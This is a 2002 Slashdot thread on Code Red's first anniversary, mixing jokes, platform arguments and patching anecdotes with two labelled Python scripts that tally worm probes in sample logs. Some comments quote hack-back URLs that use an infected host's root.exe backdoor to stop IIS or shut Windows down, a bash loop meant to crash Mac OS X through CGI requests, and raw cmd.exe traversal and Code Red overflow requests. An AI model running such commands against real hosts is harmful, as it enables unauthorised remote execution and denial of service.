Happy Birthday Code Red
totallygeek writes: "One year ago today (July 19, 2001), more than 359,000 computers were infected with the Code Red worm in less than 14 hours. At the peak of infection, more than 2,000 new machines were infected each minute. Servers running Internet Information Services from Microsoft were propagating this worm across the Internet faster than anything has up to then or since. For the first time, systems running the Apache web server were getting requests for a document called "default.ida". Here we are a year later, and my web log shows an average of forty-two requests per day for default.ida over the last five days. To really appreciate the spread of this program, look at this animated image."
i win.
I feel so dirty
Mountain Dew is good. Wrong code red? Dang!
Anyway, CLIT sucks.
That animated gif is going to be /.'d before I get this posted.
I do security
That is pretty sad when you can't even get first post on your own post!
Click here or here.
Story 4 minutes old and image is /.ed.
I don't appreciate the fact that it spread quickly, especially since I had to fix a fucking computer on my network, mainly because it was my mom's computer and it was virus loaded, but still, I don't appreciate gay viruses. I appreciate the fact that someone was smart enough to create it, but definitely don't appreciate them putting it out.
Righteousness postpones the inevitable
http://burningaureole.caveism.net
oops false alarm
It is the gift that just keeps on giving.
This virus was not exclusive to Microsoft. It also infected computers running DG/UX and Apache. Of course I wouldn't expect Slashdot to report that.
...that on the anniversary of an attack which paralyzed servers dead in their tracks, we hear the far-away screams of agony from the lone sysadmin of missingleftsocks.com as 100,000 slashdotters pillage his machine simultaneously.
Don't worry about Code Red and related problems. I'm sure Microsoft will fix everything before they start storing our National ID information.
In Capitalist America, bank robs you!
One year anniversary was last week some time. We had been running DeepSight (nee ARIS) in a test mode at the time, and actually detected some test runs of Code Red about a week before the big outbreak.
Folks will notice though that the fixed version of Code Red I (CodeRed.B) is still going. Picked up a couple of hits today.
It's been a year since the most devastating virus spread across the internet like wildfire - and to this day, Microsoft still insists that such things are the fault of the user, not the software.
My server is still getting hit by Code Red infected servers on the average of every 5 min. It would seem that after all of this time people would clean up their servers. What really bothers me is some of the machines hitting me are commercial web sites versus the home machines.
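Added example, not part of the original thread: one way to measure from an access log what the story and the comment above describe, namely how many requests for default.ida arrive per day, how far apart they are, and how many distinct hosts send them. The log lines are constructed (Apache Common Log Format, documentation IP ranges, shortened padding), and the N/X padding labels follow public analyses of Code Red and Code Red II rather than anything on this page.

```python
import re
from collections import Counter
from datetime import datetime
from statistics import median

# Constructed sample: Apache Common Log Format, documentation-range addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Jul/2002:00:04:11 +0000] "GET /default.ida?NNNNNNNNNNNNNNNN HTTP/1.0" 404 276
198.51.100.7 - - [15/Jul/2002:00:09:30 +0000] "GET /default.ida?XXXXXXXXXXXXXXXX HTTP/1.0" 404 276
203.0.113.5 - - [15/Jul/2002:00:10:02 +0000] "GET /index.html HTTP/1.1" 200 5120
192.0.2.10 - - [15/Jul/2002:00:14:11 +0000] "GET /default.ida?NNNNNNNNNNNNNNNN HTTP/1.0" 404 276
198.51.100.99 - - [16/Jul/2002:03:00:00 +0000] "GET /DEFAULT.IDA?NNNNNNNN HTTP/1.0" 404 276
this line is not a log record
"""

# host ident user [timestamp] "METHOD target ..." status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')


def default_ida_hits(lines):
    """Return (timestamp, source_ip, padding_label) for each default.ida request."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # skip malformed or truncated records
        ip, ts, _method, target, _status = m.groups()
        path, _, query = target.partition("?")
        # IIS paths are case-insensitive, so compare in lower case.
        if path.lower() != "/default.ida":
            continue
        try:
            when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        except ValueError:
            continue
        # Assumption from public worm analyses: N padding for the original
        # Code Red family, X padding for Code Red II.
        padding = {"N": "N-padded", "X": "X-padded"}.get(query[:1], "other")
        hits.append((when, ip, padding))
    hits.sort(key=lambda h: h[0])
    return hits


def summarize(hits):
    """Aggregate hits into per-day counts, spacing and source statistics."""
    per_day = Counter(h[0].date().isoformat() for h in hits)
    per_source = Counter(h[1] for h in hits)
    gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(hits, hits[1:])]
    # Average over every calendar day in the observed span, quiet days included.
    span_days = (hits[-1][0].date() - hits[0][0].date()).days + 1 if hits else 0
    return {
        "total": len(hits),
        "per_day": dict(per_day),
        "mean_per_day": len(hits) / span_days if span_days else 0.0,
        "median_gap_s": median(gaps) if gaps else None,
        "distinct_sources": len(per_source),
        "repeat_sources": sorted(ip for ip, n in per_source.items() if n > 1),
        "padding": dict(Counter(h[2] for h in hits)),
    }


if __name__ == "__main__":
    report = summarize(default_ida_hits(SAMPLE_LOG.splitlines()))
    for key, value in report.items():
        print(f"{key}: {value}")
```

On an Apache host these requests return 404, so the counts show who is still infected rather than any exposure of the server doing the logging.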
Does anyone really care? Come September 11th, 2002, I wouldn't be surprised if /. didn't post a story about the attacks - yet we post more anti-microsoft bullshit. Get a life folks.
Servers running Internet Information Services from Microsoft were propagating this worm across the Internet faster than anything has up to then or since
Granted, the 'Net was a lot smaller, but what about the Morris worm?
General Relativity: Space-time tells matter where to go; Matter tells space-time what shape to be.
It really was good pizza...and it was quite a bit of fun riding skateboards around the corporate HQ at 2:30am in the morning...
Seriously, though, it also taught the company I work for a serious lesson about staying on top of this kind of stuff. We had just finished a 2 month project to secure our web servers, but we were still bound by our traditional change management processes - 7 days notification for an outage, and testing of all changes documented and submitted for approval in advance. At the time Code Red hit, I had sent a note saying "we've really got to get this hotfix applied", but we were bound by the process, and we got burned.
Needless to say, when an urgent hotfix comes out now, it takes almost no convincing to get it applied ASAP. If it breaks a web app or two, well, that's the risk we take. We'd rather look for signoff from the business to unapply a hotfix that breaks something, than spend a few days trying to secure the approval beforehand. It's a lot cheaper in the long run to troubleshoot the effects of a hotfix that has unintended side effects than it is to watch your entire web farm get demolished by a worm.
Yes, we run IIS, and I suppose you could harp about how this could all be avoided by running Apache, but the point is that without a policy, strategy, and process for rapidly deploying defenses against net-borne attacks, no system is invulnerable.
from the original analysis by David Moore:
Flipbook animation (207k .FLI)
Quicktime animation of growth by geographic breakdown (200K .mov) {requires QuickTime v3 or newer}
UK Mirror
UK FTP
AU Mirror
original www.caida.org gif animation
HIV Crosses Species Barrier... into Muppets
What exactly are we supposed to celebrate? The inept SAs that have failed to patch their systems? The sad lack of software development skills and abundance of corporate greed that combine to push shoddy software upon millions of users?
Maybe we should celebrate the resiliency of the Net. The fact that while attacks on systems continue to come daily, and at a seemingly increasing rate, everything still works most of the time.
--knowledge, not information, is power
You have a license for that GIF?
"All art is quite useless." -- Oscar Wilde
It's amazing how Microsoft on their IIS website can make an inferior product look so nice, friendly, usable and safe - when there is a free alternative that lacks the slick advertising but that is a much superior product, especially in security.
Linux is a safe haven. It's like that story from church about building your house on the rocks rather than the sand, so that when the tide rises you will be safe. Or like people who built a bomb shelter. Or like those who painted their doors with lamb's blood so the angel of death would pass over their house and not kill the first-born son.
I am immortal! The tide of red sweeps daily over the internet and I didn't even get my shoes dirty!
Just a side note, if anyone ever came up with a virus that was as devastating to Apache as Code Red was to IIS, I think Linux would be doomed. If you expect something to fail (Microsoft products) then you don't care too much when they do. But if a product is touted as being absolutely secure and stable (Linux/Apache) then when it does screw up big, it will probably be its death. The higher up you are, the further you have to fall.
whoops.. credit where credit is due: Jeff Brown did the animation based on the paper (linked above) by David Moore.
HIV Crosses Species Barrier... into Muppets
The fact that Code Red is still running around the way it is proves for a fact that we, as humans, are just lazy.
http://www.maximum-cars.com - My little hobby.
Can someone set up a mirror or two before we lose it please??
-------
Drink Coffee - Do Stupid Things Faster And With More Energy!
From the official #python@OPN quotefile:
<skreech> I'm gonna miss code red when its gone, my webpage has never gotten this many hits before
I find it horribly absurd that Americans are still whining and crying over 9/11. Every time I turn on the television, it's 9/11 this and 9/11 that. It's gotten to the point that even things that are completely worthless are somehow connected to 9/11. For example, someone told me that they will only shop at the cheaper non-brandname clothing stores because of 9/11. I asked them what 9/11 had to do with it and the response was a shrug. I hate the fact that people are running around like scared sheep. Everywhere I look, more "public security" is shown but in the end I don't think this will change anything. People have let their destroyed egos of yesteryear that chanted "America the strong and invincible" make way for the public to curtail their freedoms for the desire of security. What they do not realize is that the freedoms we are given in this country aren't just for the good times but also for the bad times. I mean, an analogy can be made that a 'friend in need is a friend indeed' because what matters more is not how much freedom (or in this case friends) we have, but how much freedom (or friends) we have when times are tough. People like Ashcroft should be taken out of office and charged with allowing the destruction of civil liberties. I'm sure it's even worse for our fellow Americans who may happen to look like Middle Easterners or may be Muslim since the floodgates of racism and prejudice are wide open. First it was the Japanese and I'm pretty sure Muslims and anyone resembling a Middle-Easterner will be next to go through that.
I guess your post touched a nerve. Sorry for the rant, but come September 11th this year, I hope I don't see a story on Slashdot. What our country needs to do is look to ourselves and understand what we may be doing wrong in the world for people to hate us so much. Those interested in a history lesson can come back later when I feel like typing some more.
Long live a free and just America in a happy and just World.
DShield's Code Red Anniversary Page has an interesting graph showing scanning activity they've detected from active hosts since the beginning of this year. Some 35,000 IPs still continue to regularly come alive around the beginning of the month, quiet down towards the middle, and then resume the cycle again - the numbers have remained remarkably consistent.
And yet, just a few discussions down the /. front page, there's this massive collective rant, questioning the gov't's motive in releasing something that they claim is designed to help secure people's boxen. If the gov't software were just to stop code red and nimda from moving so fast, wouldn't that qualify as "public interest" enough for them to do that, just out of the goodness of their hearts?
Apologies for twisted grammar of preceding para. /me needs sleep, badly!
"The best argument against democracy is a five minute chat with the average voter."
--Winston Churchill
4,375,130 bytes long. :)
It's either really detailed or someone wanted to play a dirty trick on the admin.
I'm still downloading it, at about 1.5k/second.
Click here or here.
It may be offtopic, but he sure has a point.
June 18, 2001 14:29:28 -0700
Microsoft Security Bulletin MS01-033
June 18, 2001 14:36:53
q300972_w2k_sp3_x86_en.exe
When did Code Red hit? Did I bother to notice? Did I bother to record? No. It didn't affect me much.
how is this deserving of +5 funny? This same joke is said in about 90% of slashdot stories.
Instead of wasting your mod points blasting my post into oblivion like I'm sure you are just itching to do, why not mod the parent to (-1 redundant) and preserve what little respectability is left on slashdot.
On my dial-up account I still get an average of 40 hits a day. So this consumes a greater percent of my overall bandwidth, which keeps me from downloading 40% more pr0n.
Is it slashdotted or is that the demonstration?
;)
Server is still infected with an IIS virus (though not Code Red). Here it is
I sent them an email - almost a year ago in fact. They just brushed me off and gave a rather pathetic excuse ("the box is too slow to run Norton").
You can read the e-mail here.
Of course, these are the same people who run a trouble ticket server on the district wide WAN that any old joe at school can access and see where the security issues are.
This is the sysadm's sick joke to get back at us for slashdotting his site. Don't click on it.
Don't you get it?
"Happy Birthday Code Red, Happy Birthday Code Red, Bill sucks with his coding, Happy Birthday Code Red."
Now blow out the flaming servers, and make a wish.
Insert something insightful here, or I'll insert something painful there.
Back when code red started causing havoc to IIS web servers, a group came out with a nice perl script that would shut down IIS, as well as the OS. Since IIS was wide open at this point, it would send ..
http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop
http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5
No mac web os9 or older servers EVER exploited in history despite several different large challenges with 10,000 dollar prizes.
Bugtraq shows no exploits of a mac server running a non unix OS and only WebStar webserver, or other webservers.
One time a combination of two crappy third party tools created a minor exploit but no exploits exist in mac servers... NONE.
Is that not interesting?
The reasons are technical and have a lot to do with architecture (stack return address, c string usage, no command line, special dual fork executables, lack of file extensions under user control, etc)
nobody likes to hear the truth, but the US Army had enough of bsd and linux and nt and used macs for some of its servers to prevent embarrassment.
No one ever notes that the CRW absolutely raped cisco dsl routers.
At its peak, Qwest had a 5 hour hold time for people whose cisco was taken down by the vuln.
Incidentally, the fix killed more routers.
forget it.
No one has ever hacked my super l33t webserver that runs on my Commodore 64!
Therefore, my webserver is superior to all others.
Corporate America mostly runs Windows 2000. That's the system that needs security and reliability most. And where's Microsoft?
Every time I read about something like this I imagine Nelson Muntz sneering, in his inimitable voice, "HAH ha!"
...going to get it? Set up a fucking mirror before you post the links!!
What assholes. They spend hours upon hours with fucked up things like lameness filters and limited comments (which don't work, btw, there's just as much Trolling and crap-flooding as ever), and can't spend 10 seconds to mirror the files on their own servers so they don't suck down unsuspecting sites' bandwidth.
I wish I could keep from coming here because I hate giving them the hits, the fucking lusers. I just can't seem to keep away, though. Guess I'm a luser, too. How sad..........
/.: why the hell am I here?
I guess the Government is going to fix what lazy naive sysadmins won't?
That's the first time I've seen someone getting smashed by the /. effect, and coming back asking for more!
"They do not preach that their god will rouse them, a little before the Nuts work loose." Kipling, 'The Sons of Martha'
[sarcasm]
Thank god we have IDS packages like ISS in place to keep systems safe.
[/sarcasm]
Is there an Apache log analyser that shows nifty graphs of all the different kinds of attacks somewhere out there?
:)
That'd be cool
It says right on the image, caiga.org son ewframes-small-log.gif
http://www.jump.org.uk/caida_code_red_animations/
go there...
Of course, that is a 4.1 MB GIF file.
In Soviet Russia...michael would be rotting in Siberia!
Most people on /. probably wouldn't be affected, but it might have been a good idea to note that accessing that URL could actually INFECT your PC.
http://online.securityfocus.com/cgi-bin/sfonline/vulns.pl?vendor=Apple
I do remember the crazy traffic generated by the problem. But that is a Weird graphic.
However, I am glad that it is a gif instead of a jpeg, because otherwise it might have contained a virus
- Life is what keeps you occupied while you are waiting to die
They will have a field day with it!
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
No, not with my tax dollars. Microsoft fucks up, microsoft pays; not me or the "public". If it's about public interest then hold microsoft responsible and let them make the fix or make them hire a 3rd party to do so. However using my tax dollars to fix an inept company's fuckup is not what's gonna happen.
What pisses me off is that when an early exploit was detected awhile back (err, many years), somebody released a worm to go around and fix it but THEY were the ones who got in trouble with the FBI, thus setting a precedent in the future saying that the computer community was not allowed to take all necessary steps to fix problems that may pop up.
Kind of killed off community effort right there. >;(
Need help treating your acne? Come here!
Someone will let them know... hehehe.
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
Who links to a 4 meg animated gif in a ./ article?
Oh that's right
TIMMY!
Funny, I knew it was him without even looking.
Why not write a program that watches for incoming Code Red/Nimda probes, turns around and roots the offending box, and takes it down leaving a message for the Sys Admin to straighten up his act?
Presumably the original hole could be used to root the box, but any of the umpteen security holes that followed could probably be used as well. Since they haven't patched for Code Red, they haven't patched for anything else either!
Sigh... It might not be legal, but it would be funny.
I could stick a cardboard box in my living room and claim that it's never been cracked...
Sure, no one has cracked a macintosh, but does a Mac really do anything anyway?
Is that not interesting?
Not really. The stability sucked. Who cares if there was never an exploit if it can't handle a reasonable load?
Ask yourself why Apple never used OS 8 or 9 for their website. Because it sucked that's why! Before OS X they used AIX.
I'm actually in Missouri.
I sent it to TV instead: click2houston.com
I bcc'd you on the email.
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
Kid, it's spelled "the." /end spelling nazi comment
Learn how to use it.
It doesn't mean much now, it's built for the future.
Good SysAdmins got to sleep a year ago because they were up on their IIS patches. Bad SysAdmins aren't exclusive to Windows, they work on all platforms regretfully.
We're having a party on Friday September the 13th brought to you by the Bassline Terrorists featuring the 4 Horsemen of the Apocalypse. The flyer is two bassbins burning... not to disrespect the people who died in a pretty bad incident, but for christs sake... move on.
down here in my little corner of the .au we are SO FUCKING SICK of hearing about this shit. Get over it - you can't move on if you dwell in the past.
Does that mean, therefore, that anyone running Linux without the fix for the 1i0n (or however that's spelled) exploit, can sue Linus Torvald, Redhat, et al for damages? How about anyone running a Micro$oft OS that has an exploit taken advantage of with a worm, virus, etc, that was created on a Linux system with the sole purpose of damaging as many M$ OSs as possible?
If you get shot by someone and suffer horrendous injuries, do you sue every bullet proof vest manufacturer, or gun manufacturer because they didn't base their business model around you? Or do you sue (or at least lock up) the one who pointed the gun at you and pull the trigger? Do you go around your neighborhood, testing each doorknob to see if the house is locked, then rob and burn down each house that isn't? Is it the homeowner's fault for not locking the door, or you for entering in the first place?
If you want to hold anyone responsible, try the guy/s who code viruses and worms... Anyone with sufficient pathological incentive to wreak havoc and trash a computer system (or, basically, anything else) will do so...
Responsibility goes two ways, on one hand, those who have known for a substantial period of time that there was a problem that needed addressing, and those who take advantage of that problem... The net makes this all more obvious, at least to those of us with a smidgen of common sense...
Just because you can mod me down, doesn't mean you're right. Shoes for industry!
You are talking apples and oranges. My gov't will not distribute cd's with a fix for Microsoft software. If it's in public interest my gov't will tell Microsoft it must distribute cd's with a fix for Microsoft software. That's the way it will work, everything else you speak of isn't relevant to this argument at all.
...why don't we release a Code Blue? It can be a benevolent worm ( an oxymoron, I know ) which goes around to all the nice little *nix and BSD boxes all over the world, enter their systems, fix every known security exploit, then delete itself. Now wouldn't that be a wonderful idea? ( *lay on the thick sarcasm* =] )
And so we go, on with our lives
We know the truth, but prefer lies
Lies are simple, simple is bliss
Is this a precedent? Will we always mark the anniversary of *all* worms/viruses, or only those that affect Microsoft products? Or will we mark those exploits that affect lamer sysadmins that don't know enough to patch their own servers? How about all those Apache admins who haven't upped to 1.3.26 and 2.0.39 yet?
Yeah, wait, don't rush to mod me yet.... I know... the Apache exploits don't fill your precious logs with bogus requests....
Is this the requirement for a worm to be /.-ed?
-MW
Yeah, but who the fuck wants to write a worm to exploit .5% of webservers?
Please.... get over yourself... the kiddies shoot for the bellcurve, not an outdated and inadequate OS.
This was not an exhaustive search, nor a statistically significant sample group, and dynamic IP allocation muddled the results a bit, but it was enough to make me wonder. How many of the 'code red attacks' these days are really script kitties with unix boxes? My guess is they account for most of them.
Has anyone looked into this for more than the 15-20 minutes I put into it?
Build stuff. Stuff that walks, stuff that rolls, whatever.
I guess I should consider myself lucky.
Total/Unique
Nimda hits: 6213/134
CodeRed hits: 76/76
Damn annoying, though.
-- Will program for bandwidth
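Added example, not part of the original thread: a small Python tally of worm probes in an Apache access log, producing the Total/Unique counts quoted in the comment above and serving the earlier request for a log analyser (without the graphs). The log lines are constructed samples using documentation addresses, the Code Red padding is shortened, and the "Nimda" label for cmd.exe/root.exe requests follows the thread's usage.

```python
"""Tally worm probes in an Apache access log as Total/Unique per worm."""
import re
from collections import defaultdict
from urllib.parse import unquote

# host ident user [day:time zone] "request" status size ...
# Works for both common and combined log format (trailing fields are ignored).
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<day>[^:\]]+):[^\]]*\] '
    r'"(?P<request>.*)" (?P<status>\d{3}) \S+'
)


def normalise(path, max_rounds=3):
    """Undo nested percent-encoding (%255c -> %5c -> backslash), unify slashes."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()


def classify(request):
    """Return 'CodeRed', 'Nimda' or None for one logged request line."""
    parts = request.split()
    if len(parts) < 2:
        return None
    # Only the path decides; the query string is attacker-controlled filler.
    path = normalise(parts[1].partition("?")[0])
    if path.endswith("/default.ida"):
        return "CodeRed"
    if path.endswith(("/cmd.exe", "/root.exe")):
        return "Nimda"
    return None


def tally(lines):
    """Return ({worm: {total, unique, per_day}}, number_of_unparseable_lines)."""
    hits = defaultdict(int)
    sources = defaultdict(set)
    per_day = defaultdict(lambda: defaultdict(int))
    skipped = 0
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            skipped += 1  # not an access-log entry; count it, do not guess
            continue
        worm = classify(m["request"])
        if worm is None:
            continue
        hits[worm] += 1
        sources[worm].add(m["host"])
        per_day[worm][m["day"]] += 1
    report = {
        w: {"total": hits[w], "unique": len(sources[w]), "per_day": dict(per_day[w])}
        for w in hits
    }
    return report, skipped


def format_report(report):
    """Render the tally in the 'Total/Unique' style used in the thread."""
    return [f"{w} hits: {r['total']}/{r['unique']}" for w, r in sorted(report.items())]


# Constructed sample log (documentation IP ranges, shortened N padding).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Jul/2002:08:01:49 -0500] "GET /default.ida?NNNNNNNNNNNNNNNN'
    '%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 400 329 "-" "-"',
    '198.51.100.7 - - [19/Jul/2002:09:14:02 -0500] "GET /default.ida?NNNNNNNNNNNNNNNN'
    '%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 404 283 "-" "-"',
    '192.0.2.10 - - [20/Jul/2002:00:03:11 -0500] "GET /default.ida?NNNNNNNNNNNNNNNN'
    '%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 400 329 "-" "-"',
    '203.0.113.5 - - [19/Jul/2002:10:20:30 -0500] '
    '"GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283',
    '203.0.113.5 - - [19/Jul/2002:10:20:31 -0500] '
    '"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283',
    '192.0.2.200 - - [19/Jul/2002:11:00:00 -0500] "GET /index.html HTTP/1.1" 200 5120',
    'this line is not an access-log entry',
]

if __name__ == "__main__":
    report, skipped = tally(SAMPLE_LOG)
    print("\n".join(format_report(report)))
    print(f"unparseable lines: {skipped}")
```

Classification looks only at the decoded path, so it does not depend on the exact padding or payload bytes in the query string.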
Well it's really like the Lamer Exterminator, if you got it, directly or indirectly, you probably deserved it... :o)
Xix.
"Everything is adjustable, provided you have the right tools"
This... is my bro.
CRAZY EARL the sysadmin lifts a dustcover to reveal a toasted server
This is his party. He's the guest of honor. Today... is his birthday.
Email Mother calls out from down the hall: "Happy Birthday, Code Red."
I will never forget this day. The day I came to IIS city and fought one million Code Red worms. I love the little Commie bastards, I really do. These enemy worms are as persistent as thick-headed CIOs.
These are great days we're living, bros! We are jolly caffeinated giants walking the earth, with Bawlz. These worms we wasted here today, contain the finest code we will ever see. After we start working with real servers again we're gonna miss not having any worms around worth killing!
(obligatory reference for those who've never seen Full Metal Jacket)
my web log shows an average of forty-two requests per day
That is indeed interesting, a short time ago when discussing Windows security in a Danish newsgroup, I counted the entries in my log. I also had an average of forty-two requests per day.
This couldn't be a coincidence, could it?
Do you care about the security of your wireless mouse?
Try putting these handy tags around the deadline, and all will be revealed.
<sarcasm> </sarcasm>
Does that help?
The user chooses the software =)
Viva Unix! =)
We jokingly discussed an Evil Plan where I worked when CodeRed first came out.
One thing we discussed doing was getting a copy, disassembling it, and building a version that would install FreeBSD with Apache with Front Page Extensions and the Active Server Pages module over top of the Windows installation, with all of the web site content left more or less intact.
We figured that it would be pretty cool if we could make it so that people would not notice that their server had been "competitively upgraded" until the next scheduled reboot/update.
We thought that it would be even more likely to go a long time if we captured the console screen of the running server, and used it as the boot "splash screen" for the replacement OS...
Of course, as I said, doing this would be Evil, so we only discussed the possibility.
-- Terry
I also get this one on my Apache/Linux server more than Code Red requests:
"GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404
If you get shot by someone and suffer horrendous injuries, do you sue every bullet proof vest manufacturer, or gun manufacturer because they didn't base their business model around you?
Believe it or not, a lot of people are trying just that, and frighteningly having a fair amount of success.
The problem in the case of Code Red, and the worm of the week wreaking havoc with Microsoft products, is one of false representation, and perhaps outright fraud.
People keep getting told from Microsoft "Our servers are stable and secure, you don't need to worry." Then something happens, and Microsoft does nothing until someone has demonstrated in an amazingly public way that their stuff is indeed vulnerable.
Once that happens they issue a fix. The fix usually seems to be some method of messing up the specific method used, so minor changes to the worm make it work again.
The Open Source world on the other hand is very quick to fix any bugs they know about that can be fixed. More than once some of the security groups were frustrated when Red Hat or some other Linux distro maker, after being informed of a problem, released not only the details but a fix long before they were ready.
Microsoft has actively tried to keep anyone from finding out through any legal means about any security problems with their products. The Linux community works hard to find and fix problems.
Microsoft products are a little like the Ford Pinto of the software world. The Pinto would blow up rather spectacularly if rear ended. Ford was sued and had to fix the problem.
Had Ford voluntarily recalled the Pinto earlier (and the evidence suggested that they knew of the problem before the first Pinto was ever sold), there would have been no cause to sue them. However they tried to cover up the problem, and repeatedly denied the existence of any problem.
Microsoft knows there are vast security holes in their products. They prefer to put them out and hope no one notices. When someone does notice, they deny there is a problem, and have pushed to get anyone who tries to find such problems arrested. They are, in effect, engaged in a cover up. This is what opens them up to being sued. There is rarely a good faith effort to fix any security hole before it becomes a problem.
Contrast that with the Linux world. There are occasionally penetrations, but there is always an effort to find and fix such problems long before such things happen.
The other problem was that IIS and WPS are often installed and running without the person even knowing it. In fairness, most linux distros seem to install and set up Apache without permission too, but at least Apache has been pretty much immune to worms for the last few years. Should you hold everyone who installed win2k on a networked machine responsible because they failed to install security patches on a server they didn't even know they were running?
Microsoft acts very irresponsibly with their software, and there should be some accountability. I wouldn't sue them just over Code Red, but take the worm of the week hitting IIS, and the worm of the week hitting Outhouse, and Microsoft's complete indifference to fixing either, and we get a pattern of indifference which is prosecutable.
There is a civil war coming in the United States. Remember which side has most of the guns
Don't worry, I'm sure there must be guys at Microsoft working round the clock on Linux worms and virii...
Are you sure?
Which virus do they have?
I wouldn't worry about the FBI, etc.
It's not like it's a unique infection that no one has ever seen before.
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
For people outside USA: Mountain Dew is Pepsi's wildly popular (especially among programmers) pop brand. The new cherry flavor is called Code Red. Does anyone really know whether the pop got its name from the worm?
http://www.mountaindew.com/code_red/code_red_faq.html:
> Why did Mountain Dew choose the name Code Red?
> Our consumers named Code Red. Consumers thought
> Code Red best captured the spirit of the new
> brand.
shut up!!! That is a myth and you know it!
#!/bin/bash
#
# CGI-McPanic: script to crash MacOS X with
# concurrent calls to a CGI-Script
#
# before use, do:
#
# chmod a+x /Local/Library/WebServer/CGI-Executables/test-cgi
#
# then call
#
# bash ./CGI-McPanic
#
NUMPROC=32
i=0
# start the ApacheBench (ab) runs in the background, one per loop pass
while [ "$i" -le "$NUMPROC" ]
do
i=$((i + 1))
ab -t 3600 http://localhost/cgi-bin/test-cgi &
done
ATTENTION: anyone have a copy of the slashdotted page? If so- email me the info and I will mirror it on a cluster of servers that can handle the /.'ed ness.
gshively@pivx.com
I share a birthday with an IIS worm! Seriously!
Do I get a cookie?
So Code Red is now part of the background noise of the Internet along with all the spams, klez mails, and other generally viral nuisances.
:-)
I wonder if this is the way it goes, kind of like low earth orbit acquiring space junk, or the universe gradually dying in entropy soup? We will just keep on accumulating noise due to things like this that never go away, until one day they are using nearly all the bandwidth of the Internet and the thing will be unusable. Just goes to show how bad monocultures are.
Then again, that might be like the prediction about London disappearing under horse manure sometime in the 1930's.
[Reboot server in safe mode...]
"What in the Sam hell..."
Vaya con huevos, my darling.
Exactly. Even OpenBSD (Arguably the most secure by default installation OS, ever.) doesn't make stupid claims like that.
:P
Plus, the only reason you never hear about Mac web servers being smacked around is.. Who the hell uses a Mac for a webserver?
jeez, grow a cock
According to this article in InfoWorld, Linux cracks are getting just as bad as IIS stuff.
However, it doesn't mention any particular crack or even web server - it's pretty light on details really. Looks like FUD to me.
KangarooBox - We make IT simple!
... but testboxes or homeusers with an IIS installation on their win2k pro or win2k server OS they used. This is noticeable by the fact that most attacks were and are originating from cable-internet connected boxes.
Most IIS admins who are responsible for webservers who run company websites did patch IIS long before the worm started or better: did like MS told them to do: disable all extensions not used on the box, like htr and ida. (Oh, and removed the examples)
Ok, some company-used webservers were exploited, but this number is not a majority by far.
Never underestimate the relief of true separation of Religion and State.
Hotfixes don't kill webapps. I develop webapplications (the n-tier stuff, VC++/VB/ASP/IIS/SQLServer etc) for over 5 years now and have applied a zillion or so hotfixes on IIS and NT / Win2k server to keep the systems up to date, but never ever have I encountered 1 single hotfix which killed a webapplication nor did I hear from colleagues that hotfixes killed their webapplications. If the webapp is written solidly, by the guidelines MS has supplied, you can apply any hotfix, period.
When your developers are not that educated however, perhaps they use dirty tricks which will break when a hotfix is applied (although I doubt it, hotfixes mostly overwrite existing files without updating CLS_ID's etc, because these stay the same) and the app will die after the hotfix is applied: one reason to kick them out the door for some real professionals.
Never underestimate the relief of true separation of Religion and State.
Here's a mirror of the image.
http://razor.hemmet.chalmers.se/CodeRedSpreading.gif
Where do people get these dates from? At least do a little research. The first reference to CodeRed I could find was a post to the Incidents list at SecurityFocus.com on July 15th. The actual data was captured a couple of days prior to the post if my memory serves me correctly (the poster is a good friend of mine and a coworker at the time).
www.sguil.net
The Analyst Console for NSM
Recommended gifts from admirers:
1) DIVX's of Hackers or The Net.
2) Natalie Portman... Enough said.
3) Port me to more platforms.
and finally.... a 2nd chance.
--
CodeRed, the lower user #. No relation to SirCam.
Why would you glorify this virus by even acknowledging its anniversary?!!
"Herbivores eat well cause their food never, ever runs."
You should have seen it last year, one day we were receiving so many requests for non-existent files that our server was crawling, because our not found page was generated by some scripts. I simply wrote a Perl handler to handle it (roughly 60 secs) and that took care of it.
Quite humorous it was. And that we still get thousands of hits from infected machines is hilarious.
Heh, Internet worms... fun stuff.
Sticking feathers up your butt does not make you a chicken - Tyler Durden
Oracle is the scumbag company that has offered this to the Feds for free.
What about that worm who nibbled away many millions of dollars from Elingson Oil's computer mainframe a couple of years back. They've never fixed that exploit.. I mean hell it was used before by those guys that Superman had to fight off. Then later after the Elingson Oil bit.. those guys at that big software firm Initek did it too.. then again that building burnt down so we can't prove it. WHERE's THE PATCH FOR THAT WORM!!!
Who makes your Sig?
One year later and still burning strong.
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329 "-" "-"
